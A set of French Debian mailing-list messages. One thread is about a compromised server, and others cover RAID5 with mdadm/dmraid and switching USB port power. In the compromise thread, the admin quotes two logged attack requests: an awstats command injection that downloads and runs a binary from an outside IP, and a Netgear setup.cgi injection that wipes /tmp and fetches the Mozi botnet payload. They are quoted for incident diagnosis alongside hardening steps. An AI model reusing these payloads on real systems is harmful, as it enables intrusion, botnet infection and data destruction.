Re: Machine vérolée
BERTRAND Joël a écrit : > Porte d'entrée trouvée : Merci pour ce retour, toujours intéressant à avoir. Sébastien -- Sébastien Dinot, sebastien.di...@free.fr http://www.palabritudes.net/ Ne goutez pas au logiciel libre, vous ne pourriez plus vous en passer !
Re: Machine vérolée
Porte d'entrée trouvée : GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1\n" "GET /setup.cgi?next_file=netgear.cfg=syscmd=rm+-rf+/tmp/*;wget+http://27.45.37.235:51873/Mozi.m+-O+/tmp/netgear;sh+netgear=/=1 HTTP/1.0" La seconde requête échoue (firewall sortant et script inexistant). Ce que je ne saisis pas, c'est pourquoi la première est passée, awstats étant protégé par .htpasswd. JB
Re: Machine vérolée
Quelques nouvelles. Le bot en question est une version moderne d'un vieux truc (on en trouve des traces depuis 2003) : https://www.politoinc.com/post/2015/04/01/analysis-of-a-romanian-botnet https://forum.directadmin.com/threads/cannot-restart-apache.17795/ https://forums.gentoo.org/viewtopic-t-316934-postdays-0-postorder-asc-start-0.html Je n'ai rien trouvé de bizarre en examinant les disques. Je me demande si ce vers ne vient pas par une injection externe, la machine ayant été tagguée quelque part comme vulnérable. Le bot ne se lance pas à une heure précise comme dans le cas d'un cron (apache2 utilise mod-secure). Petite remarque : j'ai modifié allow_url_fopen de on à off dans le fichier de configuration de php 8.2 (je ne vois pas pourquoi c'est 'on' par défaut). /tmp est maintenant en noexec. À suivre. JB
Re: Re : Re: RAID5 (Mdadm) non fonctionnel sous Debian 11
Rappel: RAID, je n'y connais rien, jamais utilisé, jamais configuré Comme Hughes le dit, sous Debian (je ne sais pas sous d'autres distributions comment c'est géré), la manière habituelle de gérer le Fakeraid (les cartes RAID logicielles (via l'UEFI/BIOS), pas les vraies cartes RAID matérielles (un peu la même distinction qu'il y a 20 ans les winmodems et les vrais modems matériels) c'est via dmraid, pas via mdadm. Ceci dit, il semblerait qu'on puisse forcer l'emploi de mdadm même pour du Fakeraid (au lieu de son emploi habituel pour du raid strictement logiciel au niveau de l'OS Linux): https://wiki.debian.org/DebianInstaller/SataRaid (sauter au paragraphe "Troubleshooting / Alternatives (mdadm)" pour l'utilisation de mdadm (que je ne maîtrise pas), je te renvoie vers les wiki Debian et Archlinux): https://wiki.debian.org/SoftwareRAID https://wiki.archlinux.org/title/RAID Je crains de ne pas pouvoir t'aiguiller davantage sur ce sujet (je peux continuer à discuter mais ça ne va pas t'avancer à grand chose vu mon faible (euphémisme) niveau sur toutes les sortes de RAID :-)
Re: on/off alimentation port USB
Bonjour, connecte ton smartphone à ton PC via USB, il y a une notification dans la barre des tâches Android informant que l'appareil est en charge: clique dessus et tu te vois offrir un menu au sujet: - du directeur de la liaison: le PC dirige ou le smartphone dirige (ce dernier par défaut) - du type de liaison: charge ou transfert (avec choix du sous-type de transfert) donc dans ce menu, je pense que si tu veux que le PC puisse forcer la charge ou au contraire l'interdire, il faut que tu sélectionnes ton Pc en tant que directeur
Re: on/off alimentation port USB
Bonjour je ne suis pas spécialiste mais ici il semblerait que cette option /power/level ai changé https://stackoverflow.com/questions/4702216/controlling-a-usb-power-supply-on-off-with-linux peut être dans cette page une piste sur la gestion de l'alimentation : https://www.kernel.org/doc/html/v6.1/driver-api/usb/power-management.html?highlight=power+management+usb cordialement François-Marie Le 25/06/2023 à 10:08, Vincent charente a écrit : Bonjour à tous, Je suis sur Debian Buster et je cherche un moyen de piloter l'alimentation d'un port USB. J'ai branché mon smartphone sur un port usb et essayé les commandes suivantes : |echo on > /sys/bus/usb/devices/usb1/power/level # turn on echo suspend > /sys/bus/usb/devices/usb1/power/level # turn off | |Mais rien à faire, mon smartphone indique toujours qu'il est en charge. | |Une idée ? | |Merci |
on/off alimentation port USB
Bonjour à tous, Je suis sur Debian Buster et je cherche un moyen de piloter l'alimentation d'un port USB. J'ai branché mon smartphone sur un port usb et essayé les commandes suivantes : echo on > /sys/bus/usb/devices/usb1/power/level # turn on echo suspend > /sys/bus/usb/devices/usb1/power/level # turn off Mais rien à faire, mon smartphone indique toujours qu'il est en charge. Une idée ? Merci
Re : Re: RAID5 (Mdadm) non fonctionnel sous Debian 11
Bonjour, Je vais peut-être dire des bêtises je crois que mdadm gère le raid software sous linux avec son propre format. Pour les formats proprios il me semble que c'est dmraid qu'il faut utiliser. @+ Hugues --- Original Message --- Le dimanche 25 juin 2023 à 00:45, Romain P. a écrit : > > > Le 23/06/2023 à 10:10, Didier gaumet a écrit : > > > tu dis être passé de Debian 10 Buster à Debian 11 Bullseye mais la trace > > de tentative d'installation citée ci-dessus me semble indiquer > > clairement que tu es toujours sous Debian 10 Buster (paquet mdmadm 4.1.1 > > au lieu de 4.1.11, source "Buster" au lieu de Bullseye, noyau(x) 4.19 au > > lieu de 5.10). > > > Bonjour > > J'ai désinstallé et réinstallé mdadm et c'est la version 4.1-11 qui est > installée. > > Les informations indiquées précédemment correspondaient à un ancien > fichier, probablement car j'ai gardé la même partition pour Home sans la > formater. > > Mais mon RAID5 n'est toujours pas reconnu automatiquement. > > En essayant de forcer l'assemblage ça ne fonctionne pas : > " > sudo mdadm --assemble /dev/md0 /dev/sda /dev/sdb /dev/sdc /dev/sdd > > mdadm: No OROM/EFI properties for /dev/sda > mdadm: no RAID superblock on /dev/sda > mdadm: /dev/sda has no superblock - assembly aborted > " > > Mais en examinant les partitions, c'est bien du RAID5 : > " > sudo mdadm --examine /dev/sda > > /dev/sda: > Magic : Intel Raid ISM Cfg Sig. > Version : 1.3.00 > Orig Family : f751d0bb > Family : f751d0bb > Generation : 000b1946 > Attributes : All supported > UUID : 348fae05:95609190:20c5dbcb:2fefd6f4 > Checksum : 98449c4d correct > MPB Sectors : 2 > Disks : 4 > RAID Devices : 1 > > Disk00 Serial : WD-WCC3F5XC5TJS > State : active > Id : 0002 > Usable Size : 1953520384 (931.51 GiB 1000.20 GB) > > [RAID5_4WD_Blue]: > UUID : 3155a654:c22e1cde:d82116aa:d6bae2ce > RAID Level : 5 > Members : 4 > Slots : [] > Failed disk : none > This Slot : 0 > Sector Size : 512 > Array Size : 5860560896 (2794.53 GiB 3000.61 GB) > Per Dev Size : 1953520648 (931.51 GiB 1000.20 GB) > Sector Offset : 0 > Num Stripes : 15261878 > Chunk Size : 64 KiB > Reserved : 0 > Migrate State : idle > Map State : normal > Dirty State : clean > RWH Policy : off > > Disk01 Serial : WD-WCC3F3EY6D66 > State : active > Id : 0005 > Usable Size : 1953520384 (931.51 GiB 1000.20 GB) > > Disk02 Serial : WD-WCC3F6SZK26H > State : active > Id : 0004 > Usable Size : 1953520384 (931.51 GiB 1000.20 GB) > > Disk03 Serial : WD-WCC3F5XC5E5N > State : active > Id : 0003 > Usable Size : 1953520384 (931.51 GiB 1000.20 GB) > " > > Merci > > Romain publickey - hlarrive@pm.me - 0xE9429B87.asc Description: application/pgp-keys signature.asc Description: OpenPGP digital signature